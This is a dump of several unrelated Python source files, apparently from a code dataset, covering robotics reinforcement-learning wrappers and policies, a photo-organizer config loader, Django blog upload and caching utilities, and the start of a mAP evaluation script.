self.update_obs(obs)
return obs, r, done, info
def _reset(self, obs, info=None):
self.restart_gaze_thread()
self.update_obs(obs)
return obs
class sim_target:
def __init__(self, master_env, config):
self.env_name = master_env.env_name
self.master_env = master_env
self.feature = config.get('feature')
del master_env.feature_sizes['goal']
self.target_size = master_env.feature_sizes['target'] = 2 if self.env_name == 'Valve' else 3
        # TODO: eventually automate this for all features
if self.feature == 'direction':
self.target_size = master_env.feature_sizes['target'] = 3
elif self.feature == 'target_position':
self.target_size = master_env.feature_sizes['target'] = 2
self.goal_noise_std = config['goal_noise_std']
def _step(self, obs, r, done, info):
self.add_target(obs, info)
return obs, r, done, info
def _reset(self, obs, info=None):
self.add_target(obs, info)
return obs
def add_target(self, obs, info):
        if self.feature is None or self.feature == 'goal':
target = obs['goal']
elif info is None:
target = np.zeros(self.target_size)
else:
target = info[self.feature]
noise = np.random.normal(scale=self.goal_noise_std, size=target.shape) if self.goal_noise_std else 0
obs['target'] = target + noise
from rl.policies.keyboard_policy import KeyboardPolicy
class keyboard:
def __init__(self, master_env, config):
self.env_name = master_env.env_name
self.master_env = master_env
self.feature = config.get('feature')
del master_env.feature_sizes['goal']
self.size = master_env.feature_sizes['target'] = config.get('keyboard_size', 6)
self.mode = config.get('mode')
self.noise_p = config.get('keyboard_p')
self.blank_p = config.get('blank_p')
self.smoothing = config.get('smoothing')
self.lag = config.get('lag')
self.policy = KeyboardPolicy(master_env, demo=False)
def _step(self, obs, r, done, info):
self.add_target(obs, info)
return obs, r, done, info
def _reset(self, obs, info=None):
self.policy.reset()
self.action = np.zeros(self.size)
self.lag_queue = deque(np.zeros((self.lag, self.size))) if self.lag else deque()
self.add_target(obs, info)
return obs
def add_target(self, obs, info):
action, _ = self.policy.get_action(obs)
obs['user_input'] = action
self.action = self.smoothing * self.action + action
action = (1-self.smoothing)*self.action
self.lag_queue.append(action)
lag_action = self.lag_queue.popleft()
action = lag_action
obs['target'] = action
from rl.policies.encdec_policy import EncDecPolicy
import rlkit.torch.pytorch_util as ptu
import torch as th
class sim_keyboard:
def __init__(self, master_env, config):
self.env_name = master_env.env_name
self.master_env = master_env
self.feature = config.get('feature')
del master_env.feature_sizes['goal']
self.size = master_env.feature_sizes['target'] = config.get('keyboard_size', 6)
self.mode = config.get('mode')
self.noise_p = config.get('keyboard_p')
self.blank_p = config.get('blank_p')
file_name = os.path.join('image','util_models', f'{self.env_name}_params_s1_sac.pkl')
loaded = th.load(file_name, map_location=ptu.device)
policy = loaded['trainer/policy']
prev_vae = loaded['trainer/vae'].to(ptu.device)
self.policy = EncDecPolicy(
policy=policy,
features_keys=['goal'],
vaes=[prev_vae],
deterministic=True,
latent_size=4,
incl_state=False,
)
def _step(self, obs, r, done, info):
self.add_target(obs, info)
return obs, r, done, info
def _reset(self, obs, info=None):
self.policy.reset()
self.add_target(obs, info)
return obs
def add_target(self, obs, info):
dist = norm(obs[self.feature] - obs['block_pos'])
old_dist = norm(obs[self.feature] - obs['old_block_pos'])
if self.mode == 'tool':
traj = obs[self.feature] - obs['tool_pos']
axis = np.argmax(np.abs(traj))
index = 2 * axis + (traj[axis] > 0)
elif self.mode == 'block':
traj = obs[self.feature] - obs['block_pos']
axis = np.argmax(np.abs(traj))
index = 2 * axis + (traj[axis] > 0)
elif self.mode == 'sip-puff':
index = dist < old_dist
elif self.mode == 'xy':
traj = obs[self.feature][:2] - obs['block_pos'][:2]
axis = np.argmax(np.abs(traj))
index = 2 * axis + (traj[axis] > 0)
elif self.mode == 'oracle':
oracle_action, _ = self.policy.get_action(obs)
axis = np.argmax(np.abs(oracle_action))
index = 2 * axis + (oracle_action[axis] > 0)
if np.random.uniform() < self.noise_p:
index = np.random.randint(self.size)
action = np.zeros(self.size)
action[index] = 1
if np.random.uniform() < self.blank_p:
action = np.zeros(self.size)
if self.mode == 'sip-puff':
action[-3:] = obs['old_block_pos']
obs['target'] = action
from rl.policies.block_push_oracle import BlockPushOracle
class oracle:
def __init__(self, master_env, config):
self.env_name = master_env.env_name
self.master_env = master_env
self.feature = config.get('feature')
del master_env.feature_sizes['goal']
self.size = master_env.feature_sizes['target'] = config.get('keyboard_size', 7)
self.blank_p = config.get('blank_p',0)
self.spread = config.get('oracle_noise',0)
self.smoothing = config.get('smoothing',0)
self.lag = 0
file_name = os.path.join('image','util_models', f'{self.env_name}_params_s1_sac.pkl')
loaded = th.load(file_name, map_location=ptu.device)
policy = loaded['trainer/policy']
prev_vae = loaded['trainer/vae'].to(ptu.device)
self.policy = EncDecPolicy(
policy=policy,
features_keys=['goal'],
vaes=[prev_vae],
deterministic=True,
latent_size=4,
incl_state=False,
)
self.use_tool_action = config.get('use_tool_action',False)
def _step(self, obs, r, done, info):
self.add_target(obs, info)
return obs, r, done, info
def _reset(self, obs, info=None):
self.policy.reset()
self.action = np.zeros(self.size)
self.lag_queue = deque(np.zeros((self.lag, self.size))) if self.lag else deque()
self.add_target(obs, info)
return obs
def add_target(self, obs, info):
action, _ = self.policy.get_action(obs)
action += np.random.normal(np.zeros(action.shape), self.spread)
if np.random.uniform() < self.blank_p:
action = np.zeros(action.shape)
self.action = self.smoothing * self.action + action
action = (1-self.smoothing)*self.action
self.lag_queue.append(action)
lag_action = self.lag_queue.popleft()
action = lag_action
obs['target'] = action
class joint:
def __init__(self, master_env, config):
master_env.observation_space = spaces.Box(-np.inf, np.inf, (master_env.observation_space.low.size + 7,))
def _step(self, obs, r, done, info):
obs['raw_obs'] = np.concatenate((obs['raw_obs'], obs['joint']))
return obs, r, done, info
def _reset(self, obs, info=None):
obs['raw_obs'] = np.concatenate((obs['raw_obs'], obs['joint']))
return obs
class dict_to_array:
def __init__(self, master_env, config):
pass
def _step(self, obs, r, done, info):
obs = np.concatenate((obs['raw_obs'], obs['target']))
return obs, r, done, info
def _reset(self, obs, info=None):
obs = np.concatenate((obs['raw_obs'], obs['target']))
return obs
class reward:
""" rewards capped at 'cap' """
def __init__(self, master_env, config):
self.range = (config['reward_min'], config['reward_max'])
self.master_env = master_env
self.reward_type = config.get('reward_type')
self.reward_temp = config.get('reward_temp')
self.reward_offset = config.get('reward_offset')
def _step(self, obs, r, done, info):
if self.reward_type == 'custom':
r = -1
r += np.exp(-norm(info['tool_pos'] - info['target1_pos'])) / 2
if info['target1_reached']:
r = -.5
r += np.exp(-norm(info['tool_pos'] - info['target_pos'])) / 2
if info['task_success']:
r = 0
elif self.reward_type == 'custom_kitchen':
r = -1
if not info['tasks'][0] and (info['orders'][0] == 0 or info['tasks'][1]):
r += np.exp(-10 * max(0, info['microwave_angle'] - -.7)) / 6 * 3 / 4 * 1 / 2
r += np.exp(-self.reward_temp * norm(info['tool_pos'] - info['microwave_handle'])) / 6 / 4 * 1 / 2
elif info['tasks'][0]:
r += 1 / 6
if not info['tasks'][1] and (info['orders'][0] == 1 or info['tasks'][0]):
r += np.exp(-10 * max(0, .7 - info['fridge_angle'])) / 6 * 3 / 4 * 1 / 2
r += np.exp(-self.reward_temp * norm(info['tool_pos'] - info['fridge_handle'])) / 6 / 4 * 1 / 2
elif info['tasks'][1]:
r += 1 / 6
if not info['tasks'][2] and info['tasks'][0] and info['tasks'][1]:
r += np.exp(-self.reward_temp * norm(info['tool_pos'] - info['target1_pos'])) / 6 * 1 / 2
elif info['tasks'][2]:
r = -1 / 2
if not info['tasks'][3] and info['tasks'][2]:
r += np.exp(-self.reward_temp * norm(info['tool_pos'] - info['target_pos'])) / 6 * 1 / 2
elif info['tasks'][3]:
r = -1 / 3
if not info['tasks'][4] and info['tasks'][3] and (info['orders'][1] == 0 or info['tasks'][5]):
r += np.exp(-norm(info['microwave_angle'] - 0)) / 6 * 3 / 4 * 1 / 2
dist = norm(info['tool_pos'] - info['microwave_handle'])
if dist > .25:
r += np.exp(-self.reward_temp * dist) / 6 / 4 * 1 / 2
else:
r += np.exp(-self.reward_temp * .25) / 6 / 4 * 1 / 2
elif info['tasks'][4]:
r += 1 / 6
if not info['tasks'][5] and info['tasks'][3] and (info['orders'][1] == 1 or info['tasks'][4]):
r += np.exp(-norm(info['fridge_angle'] - 0)) / 6 * 3 / 4 * 1 / 2
dist = norm(info['tool_pos'] - info['fridge_handle'])
if dist > .25:
r += np.exp(-self.reward_temp * dist) / 6 / 4 * 1 / 2
else:
r += np.exp(-self.reward_temp * .25) / 6 / 4 * 1 / 2
elif info['tasks'][5]:
r += 1 / 6
if info['task_success']:
r = 0
elif self.reward_type == 'dist':
r = 0
if not info['task_success']:
dist = np.linalg.norm(info['tool_pos'] - info['target_pos'])
r = np.exp(-self.reward_temp * dist + np.log(1 + self.reward_offset)) - 1
elif self.reward_type == 'custom_switch':
r = 0
if not info['task_success']:
dist = np.linalg.norm(info['tool_pos'] - info['switch_pos'][info['target_index']])
r = np.exp(-self.reward_temp * dist + np.log(1 + self.reward_offset)) - 1
elif self.reward_type == 'sparse':
r = -1 + info['task_success']
elif self.reward_type == 'part_sparse':
r = -1 + .5 * (info['task_success'] + info['door_open'])
elif self.reward_type == 'terminal_interrupt':
r = info['noop']
elif self.reward_type == 'part_sparse_kitchen':
r = -1 + sum(info['tasks']) / 6
elif self.reward_type == 'valve_exp':
dist = np.abs(self.master_env.base_env.angle_diff(info['valve_angle'], info['target_angle']))
r = np.exp(-self.reward_temp * dist) - 1
elif self.reward_type == 'blockpush_exp':
r = -1
dist = norm(info['block_pos']-info['target_pos']) + norm(info['tool_pos'] - info['block_pos'])/2
old_dist = norm(info['old_block_pos']-info['target_pos']) + norm(info['old_tool_pos'] - info['old_block_pos'])/2
under_table_penalty = max(0, info['target_pos'][2]-info['tool_pos'][2]-.1)
sigmoid = lambda x: 1/(1 + np.exp(-x))
r += sigmoid(self.reward_temp*(old_dist-dist-under_table_penalty))*self.reward_offset
if info['task_success']:
r = 0
else:
raise Exception
r = np.clip(r, *self.range)
return obs, r, done, info
def _reset(self, obs, info=None):
return obs
```
#### File: rl/path_collectors/full_traj_collector.py
```python
from rlkit.samplers.data_collector import MdpPathCollector
import pybullet as p
from rlkit.samplers.rollout_functions import rollout
from rl.misc.env_wrapper import real_gaze
import time
def _wait_for_key(env, agent, o, key=<KEY>, update_obs_class=real_gaze):
while True:
keys = p.getKeyboardEvents()
if key in keys and keys[key] & p.KEY_WAS_TRIGGERED:
break
# for some reason needed for obs to be updated
time.sleep(0.1)
for adapt in env.adapts:
if isinstance(adapt, update_obs_class):
adapt.update_obs(o)
class FullPathCollector(MdpPathCollector):
def __init__(
self,
env,
policy,
max_num_epoch_paths_saved=None,
render=False,
render_kwargs=None,
rollout_fn=rollout,
save_env_in_snapshot=True,
real_user=False
):
super().__init__(env,
policy,
max_num_epoch_paths_saved,
render, render_kwargs,
rollout_fn,
save_env_in_snapshot)
self.reset_callback = _wait_for_key if real_user else None
self.reset_callback = None
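        # NOTE: this unconditionally overrides the line above, so the keyboard-gated reset callback is disabled even when real_user is True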
def collect_new_paths(
self,
max_path_length,
num_steps,
discard_incomplete_paths=False,
):
paths = []
num_steps_collected = 0
while num_steps_collected < num_steps:
path = self._rollout_fn(
self._env,
self._policy,
max_path_length=max_path_length,
render=self._render,
render_kwargs=self._render_kwargs,
reset_callback=self.reset_callback
)
path_len = len(path['actions'])
num_steps_collected += path_len
paths.append(path)
self._num_paths_total += len(paths)
self._num_steps_total += num_steps_collected
self._epoch_paths.extend(paths)
return paths
def get_snapshot(self):
return dict()
```
#### File: rl/policies/encdec_policy.py
```python
import numpy as np
import torch as th
from rlkit.torch.core import PyTorchModule
import rlkit.torch.pytorch_util as ptu
from rlkit.torch.distributions import (
Delta
)
from rlkit.torch.networks.stochastic.distribution_generator import DistributionGenerator
import random
from sklearn.svm import LinearSVR
class EncDecPolicy(PyTorchModule):
def __init__(self, policy, features_keys, vaes=None, incl_state=True, sample=False, latent_size=None,
deterministic=False, random_latent=False, window=None, prev_vae=None, prev_incl_state=False,
goal_baseline=False):
super().__init__()
self.vaes = vaes if vaes is not None else []
self.policy = policy
if deterministic:
assert isinstance(policy, DistributionGenerator)
self.policy = EncDecMakeDeterministic(self.policy)
self.features_keys = features_keys
self.incl_state = incl_state
self.sample = sample
self.latent_size = latent_size
if self.sample:
assert self.latent_size is not None
self.random_latent = random_latent
self.episode_latent = None
self.curr_vae = None
self.window = window if window is not None else 1
self.past_means = []
self.past_logvars = []
# use encoder to map to goals for prev vae
self.prev_vae = prev_vae
self.prev_incl_state = prev_incl_state
self.goal_baseline = goal_baseline
if self.goal_baseline:
self.x_svr_estimator = LinearSVR(max_iter=5000)
self.y_svr_estimator = LinearSVR(max_iter=5000)
def get_action(self, obs):
features = [obs[k] for k in self.features_keys]
with th.no_grad():
raw_obs = obs['raw_obs']
encoder_obs = obs.get('encoder_obs', raw_obs)
goal_set = obs.get('goal_set')
if self.random_latent:
pred_features = self.episode_latent.detach().cpu().numpy()
elif self.goal_baseline:
# baseline specific to valve env
x_pred = self.x_svr_estimator.predict(np.concatenate(features)[None])[0]
y_pred = self.y_svr_estimator.predict(np.concatenate(features)[None])[0]
self.past_means.append([x_pred, y_pred])
self.past_means = self.past_means[-self.window:]
avg_pred = np.mean(self.past_means, axis=0)
valve_pos = encoder_obs[-3:]
valve_xy = np.delete(valve_pos, 1)
avg_pred = avg_pred - valve_xy
angle_pred = np.arctan2(avg_pred[1], -avg_pred[0])
prev_encoder_inputs = [th.Tensor([np.sin(angle_pred), np.cos(angle_pred)]).to(ptu.device)]
if self.prev_incl_state:
prev_encoder_inputs.append(th.Tensor(encoder_obs).to(ptu.device))
pred_features, _ = self.prev_vae.encode(th.cat(prev_encoder_inputs))
pred_features = pred_features.cpu().numpy()
elif len(self.vaes):
if self.incl_state:
features.append(encoder_obs)
if goal_set is not None:
features.append(goal_set.ravel())
encoder_input = th.Tensor(np.concatenate(features)).to(ptu.device)
mean, logvar = self.curr_vae.encode(encoder_input)
self.past_means.append(mean)
self.past_logvars.append(logvar)
self.past_means = self.past_means[-self.window:]
self.past_logvars = self.past_logvars[-self.window:]
# use current encoder to map to latent
if self.prev_vae is None:
mean, sigma_squared = self._product_of_gaussians(self.past_means, self.past_logvars)
if self.sample:
posterior = th.distributions.Normal(mean, th.sqrt(sigma_squared))
pred_features = posterior.rsample()
else:
pred_features = mean
# use current encoder to map to goal for prev vae
else:
prev_encoder_inputs = []
prev_encoder_inputs.append(th.mean(th.stack(self.past_means), dim=0))
if self.prev_incl_state:
prev_encoder_inputs.append(th.Tensor(encoder_obs).to(ptu.device))
pred_features, _ = self.prev_vae.encode(th.cat(prev_encoder_inputs))
pred_features = pred_features.cpu().numpy()
else:
pred_features = np.concatenate(features)
obs['latents'] = pred_features
policy_input = [raw_obs, pred_features]
if goal_set is not None:
policy_input.insert(1, goal_set.ravel())
action = self.policy.get_action(*policy_input)
return action
def reset(self):
if self.random_latent:
self.episode_latent = th.normal(ptu.zeros(self.latent_size), 1).to(ptu.device)
self.policy.reset()
if len(self.vaes):
self.curr_vae = random.choice(self.vaes)
self.past_means = []
self.past_logvars = []
def _product_of_gaussians(self, means, logvars):
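        # precision-weighted fusion of Gaussians: 1 / sigma^2 = sum_i 1 / sigma_i^2, mu = sigma^2 * sum_i (mu_i / sigma_i^2)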
sigmas_squared = th.clamp(th.exp(th.stack(logvars)), min=1e-7)
sigma_squared = 1. / th.sum(th.reciprocal(sigmas_squared), dim=0)
mean = sigma_squared * th.sum(th.stack(means) / sigmas_squared, dim=0)
return mean, sigma_squared
class EncDecMakeDeterministic(PyTorchModule):
def __init__(
self,
policy,
):
super().__init__()
self.policy = policy
def forward(self, *args, **kwargs):
dist = self.policy.forward(*args, **kwargs)
return Delta(dist.mle_estimate())
def get_action(self, *obs_np):
return self.policy.get_action(*obs_np)
def get_actions(self, *obs_np):
        return self.policy.get_actions(*obs_np)
def reset(self):
self.policy.reset()
```
#### File: rl/policies/identity_policy.py
```python
import numpy as np
from numpy.linalg import norm
import pybullet as p
class IdentityPolicy:
"""Assuming simulated keyboard, directly return the target value"""
def __init__(self,env):
self.base_env = env.base_env
self.size = env.action_space.low.size
def get_action(self, obs):
action = obs['target']
if np.count_nonzero(action):
self.action = action
else:
action = self.action
action = self.trajectory(action)
obs['latents'] = np.zeros(4)
return action, {}
def joint(self, action):
clip_by_norm = lambda traj, limit: traj / max(1e-4, norm(traj)) * np.clip(norm(traj), None, limit)
action = clip_by_norm(action, 1)
return action
def target(self, coor):
base_env = self.base_env
joint_states = p.getJointStates(base_env.robot, jointIndices=base_env.robot_left_arm_joint_indices,
physicsClientId=base_env.id)
joint_positions = np.array([x[0] for x in joint_states])
link_pos = p.getLinkState(base_env.robot, 13, computeForwardKinematics=True, physicsClientId=base_env.id)[0]
new_pos = np.array(coor) + np.array(link_pos) - base_env.tool_pos
new_joint_positions = np.array(
p.calculateInverseKinematics(base_env.robot, 13, new_pos, physicsClientId=base_env.id))
new_joint_positions = new_joint_positions[:7]
action = new_joint_positions - joint_positions
return self.joint(action)
def trajectory(self, traj):
clip_by_norm = lambda traj, min_l=None, max_l=None: traj / max(1e-4, norm(traj)) * np.clip(norm(traj),
min_l, max_l)
traj = clip_by_norm(traj, .07, .1)
return self.target(self.base_env.tool_pos + traj)
def disc_traj(self, action):
index = np.argmax(action)
traj = [
np.array((-1, 0, 0)),
np.array((1, 0, 0)),
np.array((0, -1, 0)),
np.array((0, 1, 0)),
np.array((0, 0, -1)),
np.array((0, 0, 1)),
][index]
return self.trajectory(traj)
def reset(self):
self.action = np.zeros(self.size)
```
#### File: rl/policies/keyboard_policy.py
```python
import pybullet as p
import numpy as np
class KeyboardPolicy:
def __init__(self):
self.action = np.zeros(6)
def get_action(self, obs):
keys = p.getKeyboardEvents()
inputs = [
p.B3G_RIGHT_ARROW,
p.B3G_LEFT_ARROW,
ord('r'),
ord('f'),
p.B3G_DOWN_ARROW,
p.B3G_UP_ARROW,
]
noop = True
for key in inputs:
if key in keys and keys[key] & p.KEY_WAS_TRIGGERED:
self.action = np.zeros(6)
self.action[inputs.index(key)] = 1
noop = False
return self.action, {}
def reset(self):
self.action = np.zeros(6)
```
#### File: rl/trainers/enc_dec_sac_trainer_s2_latent.py
```python
import torch as th
import numpy as np
from collections import OrderedDict
import rlkit.torch.pytorch_util as ptu
from rlkit.torch.torch_rl_algorithm import TorchTrainer
class EncDecSACTrainer(TorchTrainer):
def __init__(self,
vaes,
prev_vae,
policy,
old_policy,
qf1,
qf2,
optimizer,
latent_size,
feature_keys,
beta=1,
sample=True,
objective='kl',
grad_norm_clip=1,
incl_state=True,
prev_incl_state=False,
window_size=None
):
super().__init__()
self.policy = policy
self.old_policy = old_policy
self.qf1 = qf1
self.qf2 = qf2
self.optimizer = optimizer
self.vaes = vaes
self.prev_vae = prev_vae
self.beta = beta
self.sample = sample
self.latent_size = latent_size
self.feature_keys = feature_keys
self.objective = objective
self.grad_norm_clip = grad_norm_clip
self.incl_state = incl_state
self.prev_incl_state = prev_incl_state
self.window_size = window_size
self.second_half_latent = False
self.eval_statistics = OrderedDict()
self._n_train_steps_total = 0
self._need_to_update_eval_statistics = True
def get_diagnostics(self):
return self.eval_statistics
def end_epoch(self, epoch):
self._need_to_update_eval_statistics = True
def train_from_torch(self, batch):
vae = self.vaes[self._num_train_steps % len(self.vaes)]
feature_name = lambda x: 'curr_' + x if self.window_size is None else x + '_hist'
batch_size = batch['observations'].shape[0]
if self.second_half_latent:
batch1 = {key: batch[key][:batch_size // 2] for key in batch.keys()}
batch2 = {key: batch[key][batch_size // 2:] for key in batch.keys()}
batches = [batch1, batch2]
objectives = [self.objective, 'latent']
batch_size = batch_size // 2
lambdas = [0.1, 1]
else:
batches = [batch]
objectives = [self.objective]
lambdas = [1]
supervised_loss = ptu.zeros(1)
kl_loss = ptu.zeros(1)
latent_error = ptu.zeros(1)
for b, objective, l in zip(batches, objectives, lambdas):
obs = b['observations']
features = th.cat([b[feature_name(key)] for key in self.feature_keys], dim=1)
latents = b['curr_latents']
goals = b['curr_goal']
curr_goal_set = b.get('curr_goal_set')
has_goal_set = curr_goal_set is not None
encoder_features = [features]
if self.incl_state:
encoder_obs = b.get('curr_encoder_obs', obs) if self.window_size is None \
else b.get('encoder_obs_hist', b['obs_hist'])
encoder_features.append(encoder_obs)
            # goal set and window do not work together
if has_goal_set:
curr_goal_set_flat = curr_goal_set.reshape((batch_size, -1))
encoder_features.append(curr_goal_set_flat)
mean, logvar = vae.encode(th.cat(encoder_features, dim=-1))
if self.window_size is not None:
if self.objective == 'goal':
mask = th.unsqueeze(b['hist_mask'], -1)
mean = th.sum(mean * mask, dim=1) / th.sum(mask, dim=1)
sigma_squared = None
else:
mean, sigma_squared = self._product_of_gaussians(mean, logvar, b['hist_mask'])
else:
sigma_squared = th.exp(logvar)
# regress directly to goals
if self.objective == 'goal':
supervised_loss += th.nn.MSELoss()(mean, goals)
elif self.objective == 'awr':
pred_mean, pred_logvar = vae.encode(th.cat(encoder_features, dim=1))
kl_loss += vae.kl_loss(pred_mean, pred_logvar)
supervised_loss += th.nn.GaussianNLLLoss()(pred_mean, latents.detach(), th.exp(pred_logvar))
else:
kl_loss += vae.kl_loss(mean, th.log(sigma_squared))
pred_latent = mean
if self.sample:
pred_latent = pred_latent + th.sqrt(sigma_squared) * ptu.normal(th.zeros(pred_latent.shape), 1)
if self.prev_vae is not None:
prev_encoder_features = [goals]
if self.prev_incl_state:
prev_encoder_features.append(b.get('curr_encoder_obs', obs))
if has_goal_set:
curr_goal_set_flat = curr_goal_set.reshape((batch_size, -1))
prev_encoder_features.append(curr_goal_set_flat)
target_latent = self.prev_vae.sample(th.cat(prev_encoder_features, dim=-1), eps=None)
else:
target_latent = goals
latent_error += th.mean(th.linalg.norm(pred_latent - target_latent, dim=-1))
if has_goal_set:
curr_goal_set_flat = curr_goal_set.reshape((batch_size, -1))
target_policy_features = [obs, curr_goal_set_flat, target_latent]
pred_policy_features = [obs, curr_goal_set_flat, pred_latent]
else:
target_policy_features = [obs, target_latent]
pred_policy_features = [obs, pred_latent]
if self.objective == 'kl':
target_mean = self.old_policy(*target_policy_features).mean
pred_mean = self.policy(*pred_policy_features).mean
supervised_loss += l * th.mean(th.sum(th.nn.MSELoss(reduction='none')(pred_mean, target_mean), dim=-1))
elif self.objective == 'normal_kl':
target = self.old_policy(*target_policy_features).normal
pred = self.policy(*pred_policy_features).normal
supervised_loss += l * th.mean(th.distributions.kl.kl_divergence(target, pred))
elif self.objective == 'latent':
supervised_loss += l * th.nn.MSELoss()(pred_latent, target_latent.detach())
elif self.objective == 'joint':
dist = self.policy(*pred_policy_features)
new_obs_actions, log_pi = dist.rsample_and_logprob()
if has_goal_set:
new_qf_features = [obs, curr_goal_set_flat, goals, new_obs_actions]
else:
new_qf_features = [obs, goals, new_obs_actions]
q_new_actions = th.min(
self.qf1(*new_qf_features),
self.qf2(*new_qf_features),
)
supervised_loss += l * (-q_new_actions).mean()
elif self.objective == 'non-parametric':
supervised_loss = ptu.zeros(1)
else:
raise NotImplementedError()
kl_loss /= len(batches)
latent_error /= len(batches)
loss = supervised_loss + self.beta * kl_loss
"""
        Optimize the supervised + KL loss
"""
self.optimizer.zero_grad()
loss.backward()
if self.grad_norm_clip is not None:
th.nn.utils.clip_grad_norm_(vae.encoder.parameters(), self.grad_norm_clip)
self.optimizer.step()
"""
Save some statistics for eval using just one batch.
"""
if self._need_to_update_eval_statistics:
self._need_to_update_eval_statistics = False
self.eval_statistics['Loss'] = np.mean(ptu.get_numpy(loss))
self.eval_statistics['SL Loss'] = np.mean(ptu.get_numpy(supervised_loss))
self.eval_statistics['KL Loss'] = np.mean(ptu.get_numpy(kl_loss))
self.eval_statistics['Latent Error'] = np.mean(ptu.get_numpy(latent_error))
def _product_of_gaussians(self, means, logvars, mask):
sigmas_squared = th.clamp(th.exp(logvars), min=1e-7)
mask = th.unsqueeze(mask, -1)
sigma_squared = 1. / th.sum(th.reciprocal(sigmas_squared) * mask, dim=1)
mean = sigma_squared * th.sum((means / sigmas_squared) * mask, dim=1)
return mean, sigma_squared
def compute_kl_div(self, mean, sigma_squared):
prior = th.distributions.Normal(ptu.zeros(self.latent_size), ptu.ones(self.latent_size))
posteriors = [th.distributions.Normal(m, th.sqrt(s)) for m, s in zip(th.unbind(mean), th.unbind(sigma_squared))]
kl_divs = [th.distributions.kl.kl_divergence(post, prior) for post in posteriors]
return th.mean(th.sum(th.stack(kl_divs), dim=-1))
@property
def networks(self):
nets = self.vaes + [self.policy]
return nets
def get_snapshot(self):
return dict(
vaes=tuple(self.vaes),
policy=self.policy
)
``` |
{
"source": "00SteinsGate00/Todays-Photos",
"score": 3
} |
#### File: Todays-Photos/lib/config.py
```python
import datetime
import json
class Config:
def __init__(self, config_file):
# open the file and parse the json
cfg_fp = open(config_file, 'r')
cfg_json = json.load(cfg_fp)
cfg_fp.close()
# read the properties
self.source_dir = cfg_json['source_dir']
self.destination_dir = cfg_json['destination_dir']
self.export_folder = cfg_json['export_folder']
self.target_folders = cfg_json['target_folders']
self.date_format = cfg_json['date_format']
self.delimiter = cfg_json['export_folder_delimiter'] if 'export_folder_delimiter' in cfg_json.keys() else ' '
``` |
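For reference, a minimal sketch of the JSON file this `Config` class expects. Only the key names come from the code above; every value below is a made-up placeholder rather than something taken from the original project:
```python
import json

# Hypothetical config.json contents for the Config class above.
# Only the key names come from the code; every value is a placeholder.
example_config = {
    "source_dir": "/path/to/import/folder",
    "destination_dir": "/path/to/photo/library",
    "export_folder": "Export",
    "target_folders": ["RAW", "JPEG"],
    "date_format": "%Y-%m-%d",
    "export_folder_delimiter": " "  # optional; Config falls back to a single space
}

with open("config.json", "w") as fp:
    json.dump(example_config, fp, indent=4)

# cfg = Config("config.json") would then expose cfg.source_dir, cfg.target_folders, etc.
```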
{
"source": "00wendi00/blog-project",
"score": 3
} |
#### File: blog/utils/uploads.py
```python
import os
import uuid
import datetime as dt
from blog_project import settings
# Create directory
def upload_generation_dir(dir_name):
today = dt.datetime.today()
# dir_name = dir_name + '/%d%d==' % (today.year, today.month)
if not os.path.exists(settings.MEDIA_ROOT + '/' + dir_name):
os.makedirs(settings.MEDIA_ROOT + '/' + dir_name)
return dir_name
# Image upload
def image_upload(files, dir_name):
    # Allowed file types for upload
image_suffix = ['jpg', 'png', 'jpeg', 'gif', 'bmp']
file_suffix = files.name.split(".")[-1]
relative_path_file = upload_generation_dir(dir_name)
path = os.path.join(settings.MEDIA_ROOT, relative_path_file)
    if not os.path.exists(path):  # create the directory if it does not exist
os.makedirs(path)
    # The uploaded file is an image
if file_suffix in image_suffix:
file_name = str(uuid.uuid1()) + "." + file_suffix
path_file = os.path.join(path, file_name)
file_url = settings.MEDIA_URL + relative_path_file + '/' + file_name
open(path_file, 'wb').write(files.file.read())
return {"error": 0, "url": file_url}
else:
        # The uploaded file is an attachment
file_name = files.name
path_file = os.path.join(path, file_name)
open(path_file, 'wb').write(files.file.read())
return {"error": 0,
"url": settings.MEDIA_URL + relative_path_file + '/' + files.name,
'filename': files.name}
```
#### File: blog/utils/utils.py
```python
import html
import re
from hashlib import md5
from django.conf import settings
from django.core.cache import cache
from blog.models import Tag, Blog, Catagory
def getIP(request):
"""
get request ip
:param request:
:return:
"""
if request.META.get('HTTP_X_FORWARDED_FOR'):
ip = request.META['HTTP_X_FORWARDED_FOR']
else:
ip = request.META['REMOTE_ADDR']
return ip
def gainCipher(password, salt=settings.MD5_SALT):
"""
    Salted password hashing
:param password:
:param salt:
:return:
"""
if password:
m1 = md5()
m1.update(password.encode('utf-8'))
p = m1.hexdigest()
m2 = md5()
        m2.update((p + salt).encode('utf-8'))  # add the salt
p = m2.hexdigest()
return p
return None
def get_tags_dict(new=False):
"""
    Cache and fetch the tags of all blogs
:return: {'blog_id':'tag1 tag2'}
"""
if new:
tags_dict = None
else:
tags_dict = cache.get('tags_dict')
if not tags_dict:
tags_list = Tag.objects.all().values_list('blog', 'blog__tags__name')
tags_dict = {}
for item in tags_list:
if item[0] in tags_dict:
if item[1] not in tags_dict[item[0]]:
tags_dict[item[0]].append(item[1])
elif item[0]:
tags_dict[item[0]] = [item[1]]
tags_dict = {key: ' '.join(tags_dict[key]) for key in tags_dict}
cache.set('tags_dict', tags_dict, 3600 * 24 * 30)
return tags_dict
def get_desc(blog_id=0):
"""
    Cache and fetch all descriptions; key 0 stores all titles, other blog ids store their content
    :return: {0:'all title', blog_id:'content'}
"""
desc_dict = cache.get('desc_dict')
if not desc_dict or not desc_dict.get(blog_id):
desc_dict = {}
tags = Tag.objects.all().filter(isDelete=False).values('name', 'remark')
titles = ' '.join([tag['name'] + ' ' + tag['remark'] for tag in tags])
categorys = Catagory.objects.all().filter(isDelete=False).values('name', 'remark')
titles += ' '.join([category['name'] + ' ' + category['remark'] for category in categorys])
blogs = Blog.objects.all().filter(isDraft=False, isDelete=False).values('id', 'title', 'content')
for blog in blogs:
titles += blog['title'] + ' '
pattern = re.compile(r'<pre.*?>.*?</pre>', re.S)
res = re.sub(pattern, '', blog['content'])
if res:
pattern = re.compile(r'<.*?>|\n|\r|\t| ', re.S)
res = re.sub(pattern, '', res)
res = html.unescape(res).strip()
desc_dict[blog['id']] = res or ' '
desc_dict[0] = titles
cache.set('desc_dict', desc_dict, 3600 * 24 * 30)
return '张文迪 博客 ' + desc_dict[blog_id]
``` |
{
"source": "00why00/yolov3-tf2",
"score": 2
} |
#### File: yolov3-tf2/mAP/mAP.py
```python
import os
import sys
import shutil
import glob
import json
import operator
import math
import cv2
import numpy as np
import matplotlib.pyplot as plt
from absl import app, flags, logging
from absl.flags import FLAGS
"""
Compute mAP (mean Average Precision)
"""
flags.DEFINE_boolean('no_animation', True, 'no animation is shown')
flags.DEFINE_boolean('no_plot', True, 'no plot is shown')
flags.DEFINE_boolean('quiet', False, 'minimalistic console output')
